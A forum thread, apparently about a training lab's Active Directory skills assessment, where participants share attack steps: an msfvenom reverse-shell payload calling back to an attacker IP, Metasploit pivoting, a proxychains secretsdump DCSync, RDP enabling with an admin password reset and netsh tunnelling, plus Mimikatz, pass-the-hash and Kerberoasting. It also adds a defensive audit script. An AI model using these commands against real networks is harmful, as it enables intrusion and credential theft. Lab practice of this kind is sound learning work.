Active Directory - Skills Assessment I

This is also a good reference to the above mentioned subject matter.

2 Likes

Hi,
I got pretty stuck with the last flag.
I managed to perform the DCSync but can’t authenticate with the Domain Admins hashes. While using Rubeus to get a TGT I receive the following Error message:

KRB-ERROR (23) : KDC_ERR_KEY_EXPIRED

It seems the password and therefore the Kerberos key/hash are expired. Is this intended?
Did I overlook another user with logon access to the DC?

Thanks in advance.

Well, I've tried to use Metasploit now a few times to no avail. Sessions don't stay open.

I tried to do it through the Antak webshell. I also used nc to get a stable shell first and then tried to open a second shell to msfconsole using exploit/multi/handler, with the intent to use the post module shell_to_meterpreter to upgrade it. Unfortunately that did not stay open long enough.

The only stable shell I was able to get was an nc to nc shell sending cmd.exe to the attack box.

So now I'm guessing I have to do manual port forwarding and use proxychains?

Thoughts, anyone?

Was able to get the 3rd answer with Enter and Invoke using PowerShell. Now I will investigate Active Directory - Skills Assessment I - #34 by Rapunzel3000

to try and figure out the rest! I was trying to get Meterpreter but no such luck.

1 Like

How did you get Meterpreter to work? I tried using the generic multi/handler from Metasploit and then using an nc shell via the Antak webshell, and I tried getting a regular nc to nc shell first and then sending a second shell to Meterpreter, but I was not successful.

I want to do this also because I too have failed to get the cleartext, PowerView, or anything else to work via PowerShell remoting.

Give me a nudge in the right direction please!

Metasploit works when using the generic shell payload; whenever you try windows/shell/reverse_tcp it doesn't work.

How did you do this?

Can someone give a nudge? Been at this from last night!

Hello,

For Meterpreter autoroute I stuck to the commands shown in the Pivoting & Port Forwarding module. Can you spot a difference? Maybe this is related to your payload configuration?
Also use your own Kali VM by any means. Pwnbox causes a lot of trouble with proxying.

msfvenom -p windows/shell/reverse_tcp LHOST=10.10.16.16 LPORT=8080 -f exe > shell.exe

172.16.6.50 -> MS01
172.16.6.100 -> Webwin01
172.16.6.3 -> DC

msf6 > use exploit/multi/handler

[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0
msf6 exploit(multi/handler) > set lport 8080
msf6 exploit(multi/handler) > set payload windows/shell/reverse_tcp
msf6 exploit(multi/handler) > run


Invoke-Expression -Command "c:\shell.exe"

msf6 > use post/multi/manage/shell_to_meterpreter
msf6 post(multi/manage/shell_to_meterpreter) > show options
    ... show and set options ...
msf6 post(multi/manage/shell_to_meterpreter) > set SESSION session-id
msf6 post(multi/manage/shell_to_meterpreter) > set lhost 10.10.16.16
msf6 post(multi/manage/shell_to_meterpreter) > run

sessions -i 2

msf6 > use post/multi/manage/autoroute

msf6 post(multi/manage/autoroute) > set SESSION 2
SESSION => 2
msf6 post(multi/manage/autoroute) > set SUBNET 172.16.6.0
SUBNET => 172.16.6.0
msf6 post(multi/manage/autoroute) > run

msf6 > use auxiliary/server/socks_proxy

msf6 auxiliary(server/socks_proxy) > set SRVPORT 9050
SRVPORT => 9050
msf6 auxiliary(server/socks_proxy) > set SRVHOST 0.0.0.0
SRVHOST => 0.0.0.0
msf6 auxiliary(server/socks_proxy) > set version 4a
version => 4a
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.

sudo nano /etc/proxychains.conf
run autoroute -p

sudo proxychains nmap 172.16.6.50 -sT -Pn -n --top-ports=10

proxychains secretsdump.py -outputfile hashes -just-dc INLANEFREIGHT/tpetty@172.16.6.3
1 Like
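The walkthrough above edits /etc/proxychains.conf but does not show what goes in it. As an added note, not part of the poster's reply, this is the entry that matches the socks_proxy module as configured above (version 4a, SRVHOST 0.0.0.0, SRVPORT 9050). The `strict_chain`, `proxy_dns` and timeout lines are the stock defaults shipped with proxychains and are assumed here; only the `[ProxyList]` entry is specific to this setup.

```ini
# /etc/proxychains.conf (relevant lines only; stock layout assumed)
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000

[ProxyList]
# one proxy per line: type host port
# matches "set version 4a" / "set SRVPORT 9050" on auxiliary/server/socks_proxy above
socks4a 127.0.0.1 9050
```

If the module is started with `set version 5` instead, the type here must be `socks5` to match; a mismatch between the two is the usual reason proxychains reports connection refused even though the SOCKS job is running.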

I don't know who needs to read this, but I was able to create a nice RDP tunnel to MS01 from my Linux attack host using these simple steps, which you can learn from the Pivoting and Tunneling module too. If you prefer a Windows experience, try these tricks.

First, from the webshell, set the registry key so we can log in:

Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0

Don't know any creds on the box, so let's just change the local admin's password from the webshell:

net user administrator newpass

Now, from the Linux attack host, log into a very limited cmd shell on WEB-WIN01 to set up a tunnel, where WEB-WIN01 is also the 10.X.X.X IP address of the webshell:

xfreerdp /v:<WEB-WIN01> /u:administrator /p:newpass /cert:ignore

In the new RDP cmd window, after using nslookup to discover MS01 is 172.16.6.50, make a tunnel with the netsh command which links WEB01's 10.X.X.X reachable address on port 1515 to MS01's RDP port 3389, like this:

netsh interface portproxy add v4tov4 listenport=1515 listenaddress=<WEB-WIN01> connectport=3389 connectaddress=172.16.6.50

RDP into MS01 from our attack host through the tunnel we just made to MS01 on WEB-WIN01 port 1515:

xfreerdp /v:<WEB-WIN01>:1515 /u:svc_XXX /p:XXckX7 /cert:ignore

It's just so nice to copy and paste PowerShell scripts or exes like Mimikatz and PsExec with the clipboard of my Linux machine into the RDP window of MS01. If you prefer a Windows experience to conduct the attacks, you can use these tricks to make it easier on yourself.

16 Likes
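Two of the host-side changes in the post above leave durable artefacts on WEB-WIN01: `fDenyTSConnections` flipped to 0 and a persisted `netsh interface portproxy` rule. As an added example, not from the poster or from the course material, here is a PowerShell audit a defender could run on a Windows host to surface both. It assumes netsh stores v4tov4 TCP rules under `HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp` as values named `listenaddress/listenport` with data `connectaddress/connectport`, which is how netsh persists them; the function names are my own.

```powershell
# Added audit example: report RDP enablement and persisted netsh portproxy rules.
# Run in an elevated PowerShell session on the host being checked.

function Get-RdpDenyState {
    # fDenyTSConnections: 1 = RDP disabled (default on workstations), 0 = RDP enabled.
    $tsKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
    $value = (Get-ItemProperty -Path $tsKey -Name fDenyTSConnections -ErrorAction SilentlyContinue).fDenyTSConnections
    [pscustomobject]@{
        Setting    = 'fDenyTSConnections'
        Value      = $value
        RdpEnabled = ($value -eq 0)
    }
}

function Get-PortProxyRules {
    # netsh persists v4tov4 TCP rules here (assumed layout, see lead-in):
    #   value name = "listenaddress/listenport", value data = "connectaddress/connectport"
    $ppKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp'
    if (-not (Test-Path $ppKey)) { return @() }
    $item = Get-Item -Path $ppKey
    foreach ($name in $item.GetValueNames()) {
        $listen  = $name -split '/'
        $connect = ([string]$item.GetValue($name)) -split '/'
        [pscustomobject]@{
            ListenAddress  = $listen[0]
            ListenPort     = $listen[1]
            ConnectAddress = $connect[0]
            ConnectPort    = $connect[1]
        }
    }
}

Get-RdpDenyState | Format-List

$rules = @(Get-PortProxyRules)
if ($rules.Count -eq 0) {
    Write-Output 'No persisted portproxy rules found.'
} else {
    Write-Warning ("{0} portproxy rule(s) present - verify each one is expected." -f $rules.Count)
    $rules | Format-Table -AutoSize
}

# Cross-check against the live netsh view (same data, read from the running service).
netsh interface portproxy show all
```

A rule whose ConnectAddress is another internal host and whose ConnectPort is 3389 is exactly the shape of the tunnel built in the post, and on a web server it has no legitimate reason to exist. A rule that is confirmed unwanted is removed with `netsh interface portproxy delete v4tov4 listenport=<port> listenaddress=<address>`, and `fDenyTSConnections` is set back to 1 with the same `Set-ItemProperty` call the post used, with `-Value 1`.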

any help on the DCsync attack for the last step of the assessment? thank you

1 Like

@meerrk4t Sure thing! What do you need help with exactly? Did you get the Administrator and krbtgt NTLM hashes?

Hey, thanks for replying… No, I did not get that yet… I've tried secretsdump.py but the DC was not reachable… and Mimikatz did not work on either MS01 or WEB-WIN01; I always got an error message.

1 Like

@meerrk4t

Mimikatz must be run as an administrator in an elevated window (meaning run PowerShell as an administrator).

Did you get the password for tpetty? tpetty has the rights to run the DCSync.

Oh, thank you, got it now. I have both NTLM hashes for krbtgt and the Administrator… now I'm out of ideas on how to get to the DC honestly… tried to crack the admin hash with hashcat and rockyou.txt, but nothing.
Yes, I do have t***y's password.

1 Like

I sent you a message.

I used “chisel.exe” to see the other machines on the 172.16.6.x network.

I instead used the "crackmapexec" tool with the "--lsa" option to see if any credentials were left in memory.

If you have the hash of “Administrator” you can do a Pass The Hash. I tried to crack the hash and I couldn’t, but doing Pass The Hash you can see the flag.txt. By the way, if it helps anyone, I got the hash of “Administrator” using the tool “impacket-secretsdump” and “Chisel.exe”.

1 Like

Niente, nada, nothing. Trying to open the port on MS01, but nothing helps; tried LaZagne with an NT SYSTEM shell, got mscache, got 4 hashes with winPEAS, but no cleartext passwords.
Tried like every command in my notes of the module.

I'm badly stuck. Tried both the Windows and the Linux way. In Linux I can run nmap with proxychains; the ports are closed and it refuses the connection with proxychains secretsdump.py. Would be really grateful if someone could give a nudge.

@stellar Which question are you stuck on?

1 Like

Ciao, I'm on the tpetty cleartext password; can't find it and can't open the ports.

Plus, running Rubeus-1.5.0.exe kerberoast /outfiles:hashes.txt [/user:tpetty] [/domain:INLANEFREIGHT.LOCAL] [/dc:DC01.INLANEFREIGHT.LOCAL] I got many new users for the future steps.